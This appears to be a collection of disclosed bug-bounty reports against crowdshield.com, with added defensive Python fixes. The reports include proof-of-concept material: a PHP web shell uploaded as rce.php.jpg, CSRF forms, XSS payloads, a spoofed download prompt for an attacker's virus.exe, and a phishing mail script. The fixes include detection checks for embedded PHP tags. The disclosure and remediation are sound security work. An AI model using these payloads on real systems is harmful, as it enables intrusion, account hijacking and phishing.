When I went to register on your web site, I found you sent me an activation URL in my email with a simple hash:
1- https://crowdshield.com/account.php?hash=c7e1249ffc03eb9ded908c236bd1996d
2- https://crowdshield.com/account.php?hash=55a7cf9c71f1c9c495413f934dd1a158
3- https://crowdshield.com/account.php?hash=24b16fede9a67c9251d3e7c7161c83ac
As you can see, these are the three activation URLs for three email addresses, but the problem is that the hash value is the MD5 of a random number:
c7e1249ffc03eb9ded908c236bd1996d => md5(87)
55a7cf9c71f1c9c495413f934dd1a158 => md5(492)
24b16fede9a67c9251d3e7c7161c83ac => md5(372)
This leads an attacker to register with any email on the internet that doesn't belong to him and to activate the account on crowdshield.com in an easy way. A simple Python script that requests MD5 values as https://crowdshield.com/account.php?hash=[PayLoad_here]
already provided to the head
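The fix for the predictable activation hash described above, as an added example that is not part of the report or of CrowdShield's code: the token comes from the OS CSPRNG, only its SHA-256 digest is stored, and it is single-use and expiring. The example.invalid host and the in-memory PENDING store are placeholders.

```python
import hashlib
import hmac
import secrets
import time

# Constructed in-memory store: sha256(token) -> (email, expiry). Only the digest
# is stored, so a leaked table does not yield usable activation links.
PENDING = {}
TOKEN_TTL = 24 * 3600  # seconds an activation link stays valid

def issue_activation(email, now=None):
    """Return an activation URL whose token is 256 bits from the OS CSPRNG,
    instead of md5() of a small counter that anyone can enumerate."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)  # 43 URL-safe characters
    digest = hashlib.sha256(token.encode()).hexdigest()
    PENDING[digest] = (email, now + TOKEN_TTL)
    # example.invalid is a placeholder host, not the real activation endpoint
    return "https://example.invalid/account.php?hash=" + token

def activate(token, now=None):
    """Verify a presented token: single use, expiring, compared in constant time.
    Returns the activated email, or None when the token is unknown, reused or stale."""
    now = time.time() if now is None else now
    digest = hashlib.sha256(token.encode()).hexdigest()
    for stored, (email, expiry) in list(PENDING.items()):
        if hmac.compare_digest(stored, digest):
            del PENDING[stored]  # consume on first use, valid or expired
            return email if now <= expiry else None
    return None
```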
bug_id=538&researcher_username=daksh&bug_category=Cross+Site+Request+Forgery&bounty_name=CrowdShield&sent_from=researcher&bug_comment=test&bug_reply=Reply
All you need to do is change sent_from=bounty and the comment will be posted on behalf of the bounty admin.
Evidence and steps to reproduce provided to @1N3 via Slack.
Hi, I've just found an RCE bug in your server. https://crowdshield.com/uploads/rce.php.jpg - this one executes normally, as PHP. :-) Code: <?php system("uname -a"); phpinfo(); ?>
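An upload validator that would have refused the rce.php.jpg file above, added here as an example and not taken from the report or from CrowdShield's code: exactly one extension, magic bytes that match it, a server-chosen random name, and a script-tag scan as a heuristic on top of serving the upload directory with script execution disabled. The ALLOWED table is an assumption about which image types the site accepts.

```python
import os
import secrets

# Allowed image types with the magic bytes each must start with
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

def safe_upload_name(original_name, data):
    """Validate an upload and pick its stored name. Returns (name, reason);
    name is None on rejection. Names like rce.php.jpg are refused because
    exactly one extension is required, the bytes must match that extension,
    and the stored name is random so the client never chooses it."""
    base = os.path.basename(original_name)  # drops any directory traversal
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return None, "exactly one extension required"
    ext = parts[1]
    if ext not in ALLOWED:
        return None, "extension not allowed"
    if not data.startswith(ALLOWED[ext]):
        return None, "content does not match extension"
    if b"<?php" in data or b"<?=" in data:
        # heuristic only: the upload directory must also be served with
        # script execution disabled, so a polyglot that slips past is inert
        return None, "embedded script tag"
    return secrets.token_hex(16) + "." + ext, "ok"
```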
For example, I found an ISC2 character limit bypass: the character limit is 60, so now I bypass it to 100 characters: 1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 Now I put 100 characters: https://www.youtube.com/watch?v=vMJRBUmHBmQ Note: it's an unlisted video. Now there are more than 100 chars there but the limit is 60 :p Fix it soon. Regards, sarath
<html>
  <body>
    <form action="http://crowdshield.com/login.php" method="POST">
      <input type="hidden" name="username" value="user" />
      <input type="hidden" name="password" value="pass123" />
      <input type="hidden" name="submit" value="Login" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
<html>
  <body>
    <form action="http://crowdshield.com/report_bug_new.php" method="POST">
      <input type="hidden" name="affected_url" value="sdf" />
      <input type="hidden" name="affected_params" value="dsf" />
      <input type="hidden" name="bug_description" value="dsfdsfffffffffffffffffffffffffffffffffffffffffffffdvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv sdggggggggggggggg" />
      <input type="hidden" name="bug_evidence" value="dsf wertwetrwt" />
      <input type="hidden" name="bug_recommendation" value="dsf ewrtretret" />
      <input type="hidden" name="bug_category" value="Cross Site Scripting" />
      <input type="hidden" name="submit_bug" value="Submit Bug" />
      <input type="hidden" name="bounty_id" value="12" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
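Both auto-submitting forms above (against login.php and report_bug_new.php) work because the server accepts any POST that carries the victim's cookies. The server-side check below is an added example, not code from the reports or from CrowdShield: a per-session token derived with HMAC, compared in constant time, plus an Origin/Referer check. SERVER_SECRET is a constructed value and the header and form dicts stand in for the real request objects.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed server secret; a real deployment loads it from configuration
SERVER_SECRET = secrets.token_bytes(32)

def csrf_token(session_id):
    """Per-session token, derived with HMAC so it never needs storing and a token
    stolen from one session is useless in another. Embed it in the site's own forms."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def _origin_of(url):
    parts = urlsplit(url)
    return parts.scheme + "://" + parts.netloc

def is_valid_post(session_id, form, headers, site_origin):
    """Server-side gate for state-changing POSTs such as login.php or
    report_bug_new.php. An attacker's auto-submitting form carries the
    victim's cookies but neither a same-site Origin nor the session's token."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source or _origin_of(source) != site_origin:
        return False
    submitted = form.get("csrf_token", "")
    return hmac.compare_digest(submitted, csrf_token(session_id))
```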
POST /account.php HTTP/1.1
Host: crowdshield.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://crowdshield.com/account.php
Cookie: __cfduid=d022fe4a4b859e83f2a384005c5dceb521418758454; PHPSESSID=8jet0csoiucsoiucj7qkfk7uv6; __utma=242435792.217988264.1418758459.1418758459.1418758459.1; __utmb=2424357188.8.131.528758459; __utmc=242435792; __utmz=242435792.1418758459.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.217988264.1418758459; __utmt=1; _gat=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 315

researcher_email=pratap.14692%40gmail.com&researcher_username=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&researcher_password1=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&researcher_password2=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&researcher_terms=accept&submit=Create+Account&create_account=researcher&captcha=36
Hi, I'm getting in touch to report that crowdshield.com is vulnerable to content spoofing and text injection. This attack exploits the trust relationship established between the user and the web site. PoC: http://crowdshield.com/%20needs%20a%20new%20web%20client%2c%20please%20download%20http%3a%2f%2fattacker%2fvirus.exe%20to%20we%20able%20to%20open%20it.%20Your%20browser%20compatible%20plugin The URL path is URL-decoded and the attacker's text is reflected back to the UI: "The requested URL / needs a new web client, please download http://attacker/virus.exe to we able to open it." Please let me know if you need further information. Best Regards, Guifre.
Steps to Reproduce the BUG:
1) I have logged in from two different browsers with the same password (the password is qwertyuiop2)
2) Now I am changing the password in one of the browsers (the new password is qwertyuiop3)
3) NOW EVEN AFTER CHANGING THE PASSWORD MY SESSION IN THE OTHER BROWSER IS STILL ALIVE.
The DANGER associated with this bug is that an ATTACKER can hijack the session and account of the VICTIM.
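One way to make a password change evict every other browser's session, as an added example that is not from the report or from CrowdShield's code: each session records the password generation it was opened under, and validation fails once the user's generation has moved on. The SessionStore, its PBKDF2 parameters and the in-memory dicts are constructed for this example.

```python
import hashlib
import hmac
import os
import secrets

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

class SessionStore:
    """Constructed in-memory model: a session records the password generation it
    was opened under; a change bumps the generation, so other sessions stop validating."""

    def __init__(self):
        self.users = {}     # username -> {"salt", "hash", "generation"}
        self.sessions = {}  # session id -> (username, generation)

    def add_user(self, username, password):
        salt = os.urandom(16)
        self.users[username] = {"salt": salt, "hash": _hash(password, salt), "generation": 0}

    def login(self, username, password):
        user = self.users.get(username)
        if user is None or not hmac.compare_digest(user["hash"], _hash(password, user["salt"])):
            return None
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = (username, user["generation"])
        return sid

    def current_user(self, sid):
        entry = self.sessions.get(sid)
        if entry is None:
            return None
        username, generation = entry
        if generation != self.users[username]["generation"]:
            del self.sessions[sid]  # stale: opened before the password changed
            return None
        return username

    def change_password(self, sid, new_password):
        username = self.current_user(sid)
        if username is None:
            return False
        user = self.users[username]
        user["salt"] = os.urandom(16)
        user["hash"] = _hash(new_password, user["salt"])
        user["generation"] += 1
        # the browser that made the change stays logged in; all others are evicted
        self.sessions[sid] = (username, user["generation"])
        return True
```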
Scenario: Researcher uses a shared computer. Researcher submits a report. Researcher logs out. Another person logs in on another account. Another person submits a report. When entering a title, the title of the previous report submitted by the researcher is shown in the autocompletion box. This gives away the title, report URL and affected parameter of the bug to other users of the web browser, even though the researcher logged out properly.
POC: An SMTP relay can easily send an unauthorized email from "anything"@crowdshield.com, for example [email protected], stating "Due to security reasons please re-enter your password", or saying that you have been rewarded by crowdshield.com and to get the reward please click below. A normal user will believe it as it comes from the crowdshield.com mail server; therefore, the user would blindly believe it and fall for this trick. After the user clicks the link there are many devastating possibilities which can be achieved by the attacker who would spoof as an authentic crowdshield.com person. For example, PHP can be used to send email from the crowdshield.com domain. SMTP relay is possible:
<?php
$to = "[email protected]";
$subject = "Change your Password ";
$txt = "Change your password by visiting here - [VIRUS LINK HERE]l";
$headers = "From: [email protected]";
mail($to,$subject,$txt,$headers);
?>
| ID | Severity | Category | Researcher | Date | Status |
|---|---|---|---|---|---|
| 670 | High | Remote Code Execution | zoczus | 05/06/2015 | Disclosed |
| 578 | Medium | Cross Site Request Forgery | sandeepv | 11/30/2014 | Disclosed |
| 580 | Medium | Cross Site Request Forgery | sandeepv | 11/30/2014 | Disclosed |
| 659 | Medium | Reflected Cross Site Scripting | pratap | 12/16/2014 | Disclosed |
| 724 | Low | Session Security and Cookies | testingcs | 04/24/2016 | Disclosed |